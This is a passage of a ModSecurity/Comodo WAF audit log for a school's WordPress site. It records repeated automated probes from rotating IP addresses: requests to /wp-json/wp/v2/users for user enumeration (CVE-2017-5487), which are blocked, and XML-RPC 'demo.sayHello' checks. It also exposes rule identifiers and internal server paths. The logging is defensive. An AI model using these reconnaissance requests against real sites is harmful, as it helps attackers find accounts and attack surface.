[rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424496288504 5179 (- - -) Stopwatch2: 1747424496288504 5179; combined=3932, p1=443, p2=3270, p3=28, p4=31, p5=93, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28b9684a-Z-- --36b79620-A-- [17/May/2025:02:41:43 +0700] aCeU99hEtho3ciA0wehdyQAAAIQ 103.236.140.4 54106 103.236.140.4 8181 --36b79620-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36b79620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36b79620-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424503941073 3110 (- - -) Stopwatch2: 1747424503941073 3110; combined=1309, p1=467, p2=813, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36b79620-Z-- --17dad23c-A-- [17/May/2025:02:41:49 +0700] aCeU_UE0LfP59mkCzg419AAAANg 103.236.140.4 54110 103.236.140.4 8181 --17dad23c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17dad23c-C-- demo.sayHello --17dad23c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17dad23c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424509142038 6134 (- - -) Stopwatch2: 1747424509142038 6134; combined=4507, p1=612, p2=3622, p3=32, p4=37, p5=117, sr=132, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17dad23c-Z-- --2bf78938-A-- [17/May/2025:02:42:08 +0700] aCeVENhEtho3ciA0wehdywAAAI4 103.236.140.4 54114 103.236.140.4 8181 --2bf78938-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2bf78938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf78938-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424528489554 2773 (- - -) Stopwatch2: 1747424528489554 2773; combined=1265, p1=430, p2=805, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf78938-Z-- --466a2c62-A-- [17/May/2025:02:42:13 +0700] aCeVFdhEtho3ciA0wehdzQAAAJA 103.236.140.4 54118 103.236.140.4 8181 --466a2c62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --466a2c62-C-- demo.sayHello --466a2c62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --466a2c62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424533856157 4983 (- - -) Stopwatch2: 1747424533856157 4983; combined=3854, p1=500, p2=3150, p3=25, p4=26, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --466a2c62-Z-- --1e41aa09-A-- [17/May/2025:02:42:18 +0700] aCeVGse47ocjCGWTS4Y-9AAAAFA 103.236.140.4 54122 103.236.140.4 8181 --1e41aa09-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e41aa09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e41aa09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424538295025 2826 (- - -) Stopwatch2: 1747424538295025 2826; combined=1263, p1=454, p2=778, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e41aa09-Z-- --822b130f-A-- [17/May/2025:02:42:24 +0700] aCeVINhEtho3ciA0wehd0AAAAI8 103.236.140.4 54126 103.236.140.4 8181 --822b130f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --822b130f-C-- demo.sayHello --822b130f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --822b130f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424544842819 6718 (- - -) Stopwatch2: 1747424544842819 6718; combined=4661, p1=624, p2=3788, p3=37, p4=41, p5=101, sr=81, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --822b130f-Z-- --1cf0e96b-A-- [17/May/2025:02:42:27 +0700] aCeVI9hEtho3ciA0wehd0QAAAJM 103.236.140.4 54128 103.236.140.4 8181 --1cf0e96b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1cf0e96b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1cf0e96b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424547285692 2355 (- - -) Stopwatch2: 1747424547285692 2355; combined=1116, p1=347, p2=725, p3=0, p4=0, p5=43, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cf0e96b-Z-- --1a00a26c-A-- [17/May/2025:02:42:32 +0700] aCeVKMe47ocjCGWTS4Y-9QAAAEk 103.236.140.4 54134 103.236.140.4 8181 --1a00a26c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1a00a26c-C-- demo.sayHello --1a00a26c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a00a26c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424552508280 4751 (- - -) Stopwatch2: 1747424552508280 4751; combined=3651, p1=443, p2=3009, p3=23, p4=25, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a00a26c-Z-- --10f3ef7b-A-- [17/May/2025:02:43:04 +0700] aCeVSNhEtho3ciA0wehd1AAAAI0 103.236.140.4 54138 103.236.140.4 8181 --10f3ef7b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10f3ef7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10f3ef7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424584426523 3031 (- - -) Stopwatch2: 1747424584426523 3031; combined=1343, p1=431, p2=876, p3=0, p4=0, p5=35, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10f3ef7b-Z-- --e75b2d72-A-- [17/May/2025:02:43:12 +0700] aCeVUNhEtho3ciA0wehd2QAAAIU 103.236.140.4 54154 103.236.140.4 8181 --e75b2d72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e75b2d72-C-- demo.sayHello --e75b2d72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e75b2d72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424592416375 5986 (- - -) Stopwatch2: 1747424592416375 5986; combined=4457, p1=550, p2=3677, p3=33, p4=38, p5=95, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e75b2d72-Z-- --b387083f-A-- [17/May/2025:02:43:24 +0700] aCeVXNhEtho3ciA0wehd2gAAAII 103.236.140.4 54158 103.236.140.4 8181 --b387083f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b387083f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b387083f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424604028234 3379 (- - -) Stopwatch2: 1747424604028234 3379; combined=1400, p1=490, p2=877, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b387083f-Z-- --d672040d-A-- [17/May/2025:02:43:26 +0700] aCeVXthEtho3ciA0wehd3AAAAIc 103.236.140.4 54162 103.236.140.4 8181 --d672040d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d672040d-C-- demo.sayHello --d672040d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d672040d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424606470138 4617 (- - -) Stopwatch2: 1747424606470138 4617; combined=3595, p1=454, p2=2942, p3=22, p4=24, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d672040d-Z-- --78b24822-A-- [17/May/2025:02:44:23 +0700] aCeVl8e47ocjCGWTS4Y-9wAAAFE 103.236.140.4 54170 103.236.140.4 8181 --78b24822-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --78b24822-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78b24822-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424663107392 2896 (- - -) Stopwatch2: 1747424663107392 2896; combined=1313, p1=425, p2=858, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78b24822-Z-- --53d28d27-A-- [17/May/2025:02:44:25 +0700] aCeVmUE0LfP59mkCzg419gAAAMk 103.236.140.4 54172 103.236.140.4 8181 --53d28d27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --53d28d27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53d28d27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424665590896 2852 (- - -) Stopwatch2: 1747424665590896 2852; combined=1262, p1=468, p2=766, p3=0, p4=0, p5=28, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53d28d27-Z-- --85bdaa08-A-- [17/May/2025:02:44:29 +0700] aCeVnce47ocjCGWTS4Y--QAAAFM 103.236.140.4 54178 103.236.140.4 8181 --85bdaa08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --85bdaa08-C-- demo.sayHello --85bdaa08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --85bdaa08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424669181856 6360 (- - -) Stopwatch2: 1747424669181856 6360; combined=4459, p1=614, p2=3616, p3=27, p4=32, p5=100, sr=78, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85bdaa08-Z-- --02d36f00-A-- [17/May/2025:02:44:31 +0700] aCeVn9hEtho3ciA0wehd4AAAAJM 103.236.140.4 54180 103.236.140.4 8181 --02d36f00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02d36f00-C-- demo.sayHello --02d36f00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02d36f00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424671974897 5096 (- - -) Stopwatch2: 1747424671974897 5096; combined=3805, p1=486, p2=3109, p3=26, p4=26, p5=92, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02d36f00-Z-- --3e26cf29-A-- [17/May/2025:02:44:34 +0700] aCeVothEtho3ciA0wehd4wAAAI0 103.236.140.4 54186 103.236.140.4 8181 --3e26cf29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3e26cf29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 